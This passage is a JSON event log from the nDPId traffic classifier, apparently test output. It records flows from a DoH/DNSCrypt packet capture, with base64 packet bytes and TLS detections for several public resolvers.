{"version":"TLSv1.3","client_requested_server_name":"resolver-eu.lelux.fi","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946739304887,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739304887,"pkt":"REREREREZmZmZmZmCABFAABoCqRAAL0GK18KAAABM56TMtqaAbsV\/Em6hf1DuFAYAfWH5wAAFAMDAAEBFwMDADVGrMk33Jx9u4V9oT8gk9T3N9siooKVMszOs96zlvjMst5cKF\/6mDE\/X3tfb1uyKq+NLUpVEQ=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946739305016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739305016,"pkt":"REREREREZmZmZmZmCABFAAFIJYRAAL0Ggi8KAAABuf2aQugMAbv\/W2fgE34PaFAYAfYWNwAAFgMBARsBAAEXAwO7rF9fivBYq0PPnnVftpI5xv63Wth8iDXYIbCI66xBbCCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jAAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASZG5zZXMuYWxla2JlcmcubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIHdlaU8VTQtoxOo631cPtMLo1fhD\/NP8\/WHh2FCfWmp6"} -00909{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305016,"flow_last_seen":946739305016,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739305016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04400{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946739305061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739305061,"pkt":"ZmZmZmZmRERERERECABFAAuA+UlAADkGKDK5\/ZpCCgAAAQG76AwTfg9o\/1tpAFAQAIMgbwAAFgMDAHoCAAB2AwNWoPreEkJ\/UPiZCRV0IEx6jRSqugqY3M+B37V87ydZxyCVvQ4J9sHqcW\/KB2T6FVper40CtcJE9we9duJ2lwo5jBMBAAAuADMAJAAdACB0RVn8jGqUM9fyfUTkTuhvHxWfPva1vJ9a18\/+TyUNbgArAAIDBBQDAwABARcDAwteuwCVRbAjw9pKtY4dNJzB+NkDPzUPU\/YSrAhwNpHIEK5V+o2\/HqZHUFxtVJbEBPgURU0pRFWa9dL9lQp8LuDwWHwDq1H1B4wIu6Cjn5BK872nUeQltRw5+FbrO5MDeZZJRgg48HKHnsK1mBHQnXLVwFvBE\/e\/UwSrANn9vg+B6zkss+nwjnEuw1XfKHcjr3B+gq7Tt\/pkx\/SEVt9DDhoVQjkT+nj8Ch6uFvKMxBfoNlGXQAfQ76Cfus9zBAZT5EY1YHp8kypEbWJsqWobkhk3j7efutg\/+7i\/\/3hwY3S4DA+PZFxsrSsM6AIVwaJ95fOH1dRdOyCRxbfVQ1s5uNDJcA7OdsaNR8VQ06UA5uK3FnFY9IaeCSIuzswKtKKP\/cTlEabfxoFlZbInteiv8UhvUx14oYH8877iKbTHauga0SrPYwJ3hDQ38FuPBJ16hIcickFsAxoIxHcrJTcDxD31\/+27P70ucqJUKNnKmwnMS5iCjU275dZeWQ9Zr0T4s7GAOpJ\/qhuQ0adCzilfe+zxessB1BHzKqNpomqUeAJU6wiiIZGwIQCSR9TnB+R6Furn+4OgUG6PGNdXCZNQ9itsUGoaOah9Fd+b\/mJSMoK\/FuhgIcCIxvGAml0OlSPbxxyIuGAWgYtRBimB3o6JaqY5BlDiRDxZX24w4nNBhNEgZ23H2qCY1hFOw\/NxAIqZ6i1OczcdQK5je4mFGQnk7n2Dd0xCvT\/QbVT+DGwohNzMpmrD81sKP2YRMryNcEXaCYgEk0oi4bjQNtHjwEi3WiSTxdHtROjzPbx1MuktYL6gASggOg1Ub+v8yVRI6bLdeV5Xwvz5ZxoF9vdrBEyvVBdMauaRYoyVnXm15LfrTPUCeXkHS1kWpj909RBaupD8tKI35AMNBM63GiCNIPCKacZOle5IpXYl1uAfPyEf7I7c\/Z2VAGWif0f1eRsudqghQ1VDSbMFMSOUlZF8oqR69Dp+GUrZSkzXH\/vlToVdum7PDCHkza\/W9cBDPI5wtxaPFdq19aD9CF4UXzcnY86h4hX1BAKMl5ymvY9oQmQKwLyZZk7gJ3BG3QSRRkEJLHmElRTA\/j6+UD2DUirljLXPFbrXC2eKn2CCwq3Zuv5P5wO5+t0UU\/yghFoQluNjQ3lfw4zQuwuXqm940OzzyqoEcUuHVR8IXnZ8TZqE90q8rCtGIOP+LD4hWpqBqHuwk66vMcJQgwNCFXix5ZnSXLN0BgV30sQI8N\/4QNcrVg18QrqrwMX5353ArFRERLIaGuZFxOud2tKJXNi7\/8bnQL4pfggVMDHzys0Vv2kSkmMM9AH5fy6is33XJQsCiLeVAW2BJv0HWG\/2v54ftufeuJKqjAweFaFpf8nOnSzUujidt2Hj6vD7NzSy9u5bVuAiVU8CLsOjLUQDZZwuXq5KPOpcqPkwUfO\/JhY2IYSty68WbtoEQ\/LicI5G0k7qhGVYDDLZjTT029eOEYuXI7f+lB6Kb+6SLaMGDm8r9Mw7ebinM16XyWOwJ5JBUayf+vtez432JNrnbq1SGS5rLH5Fg5ZMgKUFbGPULmfIDV2jwsa5no0weJKoBPHSF0j2z2Ws3ZeYohMSNwPof+eIkWPeDsS0odMH3bOI8vjnmbAlt1LEuTlP9Bgfbe4EZBkTArblnr1PduSYp9HHqPcDcdegoFu3tk12XJWCeAczLwMdcKTivhfzRMPv6R\/QbwvNULNcqw3kjep\/lhPa8MK5fd2CGyIw+LCWxGXv+q\/ds\/TSYSN0doo9wcXYWwj8LntYcpK6i8bE1mnU9HhfDXOdgKZheyUxq\/2aHTotcU7hlwJGxzG1S8L2XOL+e5cK\/uWYrHMSCsilBLjzbaE58\/UhgQTo4G7REl65txB7jkxytOXC2V8igiA\/VVPL1iSyOqszjZhZj\/KQ7cRXbuiY2hUvh3d1GHeunUPxkjVr7SBFLwo5npluN5uAfc+7Lx2v8sh\/0AXjRBQzrzXUGOKzmSDk4EsluiAOjG78HzOAmharQORiNXCoRaRa+fhf0Ejafe7HoDuKqj5ukCKAbsCU6se\/uViDv0Ko0frloNjTZWVHeFLAU\/8Rxbf5R8lMV480rpPEWmLytLklZol4xviBgu3uvWIUzW30atpHjpq+x1y1B4ZeqEOMO83R7O6ddmc3f06vtoo06tW\/Agu9h766pQvpNm2vTYudTnd6DSqBlKI5KeonXz4AxZiEG5DKNiVkur+pxwlM3ugAjT44z5C6NIq2xLtYBKvjI4ZiVK+oThODcy5mgGaurXo21aX3cTizFa3bH6OPqttL9gjP05Bka27HY2jgRwKVSbziiMro9AX8Xsmg6S2yWOPjJLfqZCcbtLmpaNGvdFtOkH77j4F52qkt+me41p1UftUvN6wiwxxp99NI0\/fMosQgl7ighWoY2W\/IB0fXHatEvBsmPr1KEj7P+aJaj7oNVmyRVuFHPwaBwwi7T8Vvj9wG3gSDuuYdP5+UFDM+35GxMSRkihqY1Nf52lvDc2vDx7TdolcUJnmrezHB7iOplwsA\/pnoSxDqDzY8u2hWCRC+c4jg1z3vL2zvzGplrkFak387ZT7iXl569hRQY0g6W72J\/qU\/wWvKrh5aic7Fca9+09fN8mKvizdcBFS1tmo5ud9hSP5IApLh\/AqNGAsSvFB77AMVMPcqCZqs\/LzhQ6p8mk1Ztud+POMwqvs7eCTrsyIwvCFHr3MjxRECobkoOUnKuDn6O2Ba4MeFaOtHE1XjJdkhICNgy76FwlNk7qa2miONerIZrFWrQmU2yx1Al5ihAv+BSYo7OLYt9zXUcCSntdFwaG5iWvn2D3TqvQcyGsX7n8R8YOUmBL+xEDz8\/cHI76eHoMT9Gcmgev3Cz2de\/7ilgKsoMsC9dl+Ldtg+QDnuzeji5lROtOH+fv+MRICCWa3t+oaVa2XgjAhIywmeaAGP7+W10HhLqbtIimjrrdbxpeltnnJv0HxLov9cXj+b0Pm2tBSSGlhGmiCqLRib5vepRDq5ASTdoFYCIMH422KVZztJ1b63ltyCjG5NtOVaK\/MkO7\/KWS1XPbQXAVUScApoXkKlzQiVxTCMZQoZIoE4pH0+fjzQcElC405f+pmLRfF1iVpdbRwPdWdjvokVy8bVGY3GGXVtgS7DasELvMxZruoBcMEH12JcU31nt00epqRaM7Ty\/hGPJ9RgbFIN6nscoLHLm6YFkdOMqn+3D0CMvB4x652Bu8PF5m7DHJMIBJSoh\/WEUOZDxlHi5CT9KYRNTMZDhIkJj++9o8TtwBf\/+FOKgQZYlLc9emRrICiIhqz7dIu9M1nNq8igrwodBBqfV3IJasHHoy\/F57WNpO6ufh54oPFaVKYJn1bg656yNokeiXMSkMhJsmjb0+SAmQ0rTBRRWtbjoeZCc3gkigutNXY3WNHxKSc5xsJ9iyr3gTZdRpWgWbT+isP5Ovqam4GzSglt\/k+unyjMz4\/f8vVi\/7W288anM52u2gAT5Id3RGTrtEQDPQ8UVftSrylfoNAZTKGGhUJLAcmefkYZfUt\/EB+t1\/S5DOAvsgdK0URdbVybob0RmFJKIBsQ7DYRwD\/HgqXJ6uMDVUKO9XoO+9dwhRf11sqhooAzPCeXtVLggV615qXldaBtBjJ4Fa\/LAamnbZck+pr1D1RAPJP4HQwfBLL\/eWmzwOCA4y+tqnSn"} -00951{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":44,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305016,"flow_last_seen":946739305061,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3192,"flow_avg_l4_payload_len":1596,"midstream":1,"thread_ts_msec":946739305061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":59404,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dnses.alekberg.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946739305063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":946739305063,"pkt":"ZmZmZmZmRERERERECABFAAC4+UtAADkGMvi5\/ZpCCgAAAQG76AwTfhrA\/1tpAFAYAIPkeAAA4ov2OS2FYwHLyLK8HvldhjW58oZhz\/dEDG0qRvP07Xrr9KbrwFzXsPAENpwnRYTilEXtuGTXfjP8+51dqVC3h3Voz6vzPB2E1qN7598iQNHjvdaBjrZ71M3dNmhXs0fudaDBYxVH3HnrCgr\/VoLnr9AAImTV5ybiMJS9e3W0V7h9Z35p6EhyTXdDS8\/1x5Ew"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00841{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946739305650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739305650,"pkt":"REREREREZmZmZmZmCABFAAFBLvBAAL0Gw1EKAAABrGhdUJ\/qAbvjN2w6lQOuzlAYAfbLqAAAFgMBARQBAAEQAwPaSOnODEW\/53X3FLI0n+Mih\/iyk2Bze7sXLhS9N0ueoyDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hgAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALanAudGlhci5hcHAABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAgYin8bJdqHx3ibHrbfDgwuFVcZV3PPNkWvp1zHo7\/2AM="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305650,"flow_last_seen":946739305650,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739305650,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946739305852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAXUYr5AADcGEPGsaF1QCgAAAQG7n+qVA67O4zdtU1AQABbJOgAAFgMDAHoCAAB2AwMioc+jlzNc+VBJaZcDKojs21jGEKcSNKyg9ExllQqy+iDada2r8SjLZf4K7a+NbQASLzSYT4924P6pAuqOJM8\/hhMDAAAuACsAAgMEADMAJAAdACAdEExo5yrIKmMZ4nrOia6UHa7Zh09ZMNUZYLDF+NYxaxQDAwABARcDAwAkT\/VVW9e6tSXUn2DgdOFI1vJ9CWMqaG0B1UgAogfcRWwpZ74dFwMDDDNZ3TFhx2HRd\/d\/BnLRqx3w9gJyapE59ga0mk6Gbdpy2uhfU1raH\/kLDwO0PHahqFeiov5PtmafDzH5oAzRDBThfFaKNK986AJtqna7+\/+W9HqZppsUeMeFtSdutMbm9VkvNNWFsngalQ8\/TjlWYt\/LNabidW0R+diEYRXkVHectSDnGgpIKw7AqJmgGmRJSQFZmk8mMFHUip8Ns8L0Qm+4mFM3OyM2y8uotBFp52jwBE4JcdWTlWvX638UUEwGd0+Jev1b4UZvqaI8gBJQiwDYthQvx2cilE03gvQZUs1gLv40OT\/eDg1VwASYtXu1QKuaTXj67d3FvJUxTfjdc9Un1x\/xpNxQ9IvL0JgGMqp5Nvz4C+qRYd\/CysKeUwM5LkGikxDP3qZXZjcRDF3CvWl\/0RJAgB68oCh4lzQ6BTBYQsLIO+2npSdMMO1mcmGxOeyAtRoiglI\/Mu+7bxclTAdkFUgpS6V0wzwluZmFW7Rx4iiSeZWVmQDKjFeHStRAafyFrtH26wCU1ei1O7zDiCd\/St5EWtAfoATjugif\/dASmeS6peR\/N837DyefuOM7XNJbAUXXdVYFQbj88dVPYC1ZWfSpl1wPAKf87TREgv6h4ZkxzRnB6COvKSvUqklCC1SSMJfennS1L0Etglf8wZsulJYWIe6+sEiyvEkrN24bb021w2X\/KuVEn+j5dyEDiGG5loD+4VYwc9G5Wa+jxRUO0+A62CO2opPif7xWIxQXRSJ441bKp\/i7j7P+cl88sdZsTxv2ygPWKGEBO4XHbg95EUra3m5LdhfhQUM\/e\/n+Ak+LAL3mStir5xjEDf9+haA4s5VbKmTRNrJtFiUwt198TeBjvlKCejLbJO6d8gE6SQECz4iM7IcNa\/bXR7adNUuu8qhullq5WfyiHcztVpItdHmrHXbaCsGaPgIKVpIJp30oUBjXbdyBrklTyARetsx+L4hfDlDZiZOEujpickcQVHRV+Rq6dF5UrRJYU3XU\/ZcqBeRvNXpu9d46M\/bhnVClgq2Bd+aOiR2kaho07AGNJ9Fr4k5Jos+2Q6DGpQasXC6x+iPauGKBp59nwGXbOOKtd8ArTxOlVzQmOZH6I0tx+iKMplPSCHR8FFec2EwXBLm\/1vyI9Pwo+zYiVdHp09rRHeJXaKGgiynxtv128gHPWfts6k\/bUS8N1Dw2y1OWa2cDxVOv79IA65ALHyABrPQbEH+byQd5tzeWrWUmzmNi3p4jdd62IgsA8HkYmsZmy5jIyKyWEYlUo1SPeqjIhX9VriaKoSoSKPFRDULdhc+03ZBXd6SKMHCSS7x6DpL0ufFkfc0ZfcGyz8s\/jngcscp5gmPQrY+VfOmrZe4EnOIAqkwdbS5Vejc5Yga2D4LRGGWgMYBm5SScqu5500ZCpE0WmkryZPm\/4OMJ47iDZWRTkVie5Ea9ONRDlM9tVglWZF\/oUiAJVVWh4mt0z6nVYUgTMbtTn0pDKN\/0TJikQ5gt3TXgtioj57ko+eiK8raQcuhqyXG3KA52lsLM2MmWuS6VxCjD2hxANDc3R7BZOaM4bmyza4JUsEms3Y5aNGYiFwaMTvyvPSX55q5QHTJ\/Mi827fNg4TtCrFRxN6XxJuU0RfIATOX3faQkD1YP1V51gStaTXEj1EBrNyqEnKqYk6Yxs2aBmn4CqaTQ7ru+2yyoapdX3D0JCzKb"} -00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739305650,"flow_last_seen":946739305852,"flow_idle_time":7440000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":1733,"flow_avg_l4_payload_len":866,"midstream":1,"thread_ts_msec":946739305852,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":40938,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"jp.tiar.app","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"475c9302dc42b2751db9edcac3b74891","unsafe_cipher":0,"cipher":"TLS_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03431{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946739305852,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2248,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2248,"pkt_l4_len":2214,"thread_ts_msec":946739305852,"pkt":"ZmZmZmZmRERERERECABFAAi6Yr9AADcGDgqsaF1QCgAAAQG7n+qVA7R64zdtU1AYABbTIQAA7khOXiRDmimON10SUW6EdkRNtideeCAmsCP9ufTAbxPBEESbRp6rJdX9WpgeGKEcs1FSJYqSgEbwbmVZ45a190xHBVgYJoheRrXwVU8\/AsBaHDXul428WYkRrLMS2d7ip3ZonDd7PZHF6J0j5\/wI70KV9AUCOBt\/Btv4kzO+Hj+j3yK5bLSbWlRhD1fuMQAb+cF537u0\/U3MsC4OMo+87usOrwz6eMrKL+s31DCb4z6f8eENi68oRi9OZYKpoRYjhFkw0unmspSreLKjulrpWluVXrk1btWPgYpUVnavuXquTK1NtVner355EoOvAf5CAN1Y8OcMXqML8XqYMeqEg34ZtCcYr+tnetE29K921LwsoIOkJdbaiCVLTv\/9X++VjLPLL4afBqrrwx2ZkXw2VSOvNSpMcVsFQ2sks0er7rCvo3vy970zXk8N2ZRM9DEPyk4S8i+C3Yw3j6efIbDNyRRGIb1TGn6z1LzsFfHkHQ\/coPiZhIhvnK6o5iGWcHYOGEPLh4XlmZt5EnCBavREWdcXDAq+Rj+biwLLNbp9Xm75T3bbWxLQivCzGfNO2oBB8jJz2Zicez5S7098raXjnFVLWws7S\/ZjTQ11gAbLNqyHJOm\/RerOFZpkbGJsCCKjsmgBFYujoZTifdvrnskuFGuKqjRU7sBnWY38jO4yTlznAvt2Cf2\/I4bnh5roD5\/h3R\/5c28EQTDGmOL2\/KspdGSS1bjToJBQbcS2YbFnjwR5yrS+5SOLXVmRcZDGU4Ke3DaCJifWpD1EVuVb2ilryPAD8yGt9JaIe3cT9jnaxoJojKtbQNqrLa4+HAzDJSTrT+I7IXNvzHDQ5HJdRQkyKEzhMuedfOGX3aae0qJMXEdgmL8U1YL9LUgqs4gaInFpYecyGYMFaC7RpVTbVJ8AclN3JFij4ikMLs8OvolwBsIUxkwvTd2kxXvS\/GtkZpTdB40Qwypq6\/slHam9c8zmzEZ9VsQqYPOs7EU3IWXPB\/7jwR\/Swoqx9IepHlyCi3ipHUa3krt79WKeMN9slFrvDSuGQo7cCX4PwLWqGq1s8n4xGAwbb4PADqo8FJSgQHdjNMolIHMWyuqk5nqOgc0W36SeHQOxctDFxw00aD7\/ZIjnA7m+97J5Qh0XWgw5Lpsc8Mvp+VBxyMQklBuDFOyN3HJKbg943DoSjIMucZn1tzh8KOxw0Xql8+gP0Tj\/ncw8jVi\/PzuMVXmWMiQX\/wdJfEzJkJUlcXDAAE2IesO7KR0oZhnwcsaVEwrsJruOKxYtv2pbkmhOIxpFm4wJGmE+2JRFXkQDnRtvWvAJoF\/v0k69TDViO86TF2AjLFejfwjQQnCJXVkS4fuCh3i1TYrS+lUkfVezPrjjWW3F2LEdQQXJZmRfoBHSJjBhCP+Dcoc3jONSa9PXKqNJSf7Vo6MbkHB0XBcD7sdIZ2\/wIgxkllAd1uSaGBwJI8\/jhtA8RENMPWOxsz00xpbl8rHi+OkSD\/7Q58nbh7qhfzlemdSmsTNYU4yTeEr2yQTmNZcolwert2uPuF9VK2g\/3nveH2piPFCpAJOd4Z5dmxFR4fRYAGlILa5aNYiyWSR3G947wAwiYaU7l0JrzUlByQFpex9hGDkjjcctCUn8127O6yoOswVES887ts\/gfsXkn4d0JROgJbDiWFnN7j7+sZKWDkghhJYjTBSDkBNASiM9XLxgQ\/DaEwEwxYA7HjPEO\/8BxDusP8aK8hEqBPa8c8eFHdAYT3Eu2hChRagjV1O7Z0Zuc1z25GaMGiFKl7kwOrHIqt7609HLDEc8DgoFPHHr7IZJAecPMzvqj2CVzFTWl+NcGQgu1OZDB7YN8IsYE0Hj2wxjJJ4M8ncKFSWkLxvPRwAg+0hpC\/tSOqvX1jgKKAZg82Jl+tqVLBoZ773\/7qHfr\/BAX6oJ0vKtNpEDEGeMy6jjr8KxmYOPhgJuUsXOSiQKReqTW0HLQJn9LpGUn4zKUgOBpUtJCVQOwstz8rJvV98lhrypc92o1bXoXeUIxGojGdQmZAgxriin+ux8aVQDWCuRuunDdKlwCqYBaBQ5f2rPbpDMmRJRFIQV93Nffpu5y2M2nD2zqfxShtHtZqK9Odguom6eKtfMYRNoP0\/G2utDI3qzWXA4Mjnq20qW6WLp3\/OACxfwxJs+mIIux4CN4Of382BKD+HUg6iVDD+mi+PZO8yXcm+iMHr94FuVjknbJgwr8pz8hnl6BJO7Py9BRIAZSwIskF6wOgI\/\/4Qr2JcZ3TwaII9SEN+0Sx8PMXXAKDv89DA4GNqNhV0hw6VXwyvbxpg4tI+badMBjtd\/o4XHqPH+BgFz6M8EMB4Jddticq89uWfyyGOVmNlx8K6oUYEdD6RJBEwIP6yYPzzeebCbDK3en7B16cFcus7h8285+5Wxpsa9ruV64Q9ZoEhEUMGgffnT5ajZ+UpmS77fDl+DfNEzJY8TjXm9EL8XAwMBGQ9SGwhaT+0AWTV1WADn36NruqoDTHdQXMB5KJVX+hyENZfYkPjY19bk0TmuSlxnW4sPXtcFmHvEzv8TYCgHXXFqdgaXEgdtFhRRSPS0CqywSlTwtg9zlqkP6Vu\/gi2jnM2lX\/S3paNkHLJK2Xs42G6p+yMmyRBfn14DEFDykxvC8z+scW1WMMiVZcbQBKhJ+Ek8WtRoS9WYaJ74jobV62XFVLje4Al6wOy0PssyggYMNCsvtsxQ5KXxmsj4du7sF6hIaLMWOz7O8LamYiEYnY4YByhzDbINOM3XB385ribm3TlBE2FwQhpCNmgQNjG7wIBC9IfEBLxv5rxwvF8PVckgsWpRxADmo+gltAb0\/tgSzKl\/30lZxZ8BFwMDADWhE8bE7ktzdpeT1iEQv9HPHLrjBcBDs9EHJnB16E0omVuS5qQqwxUOOBNAVfkBff92\/dyz\/Q=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7440000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 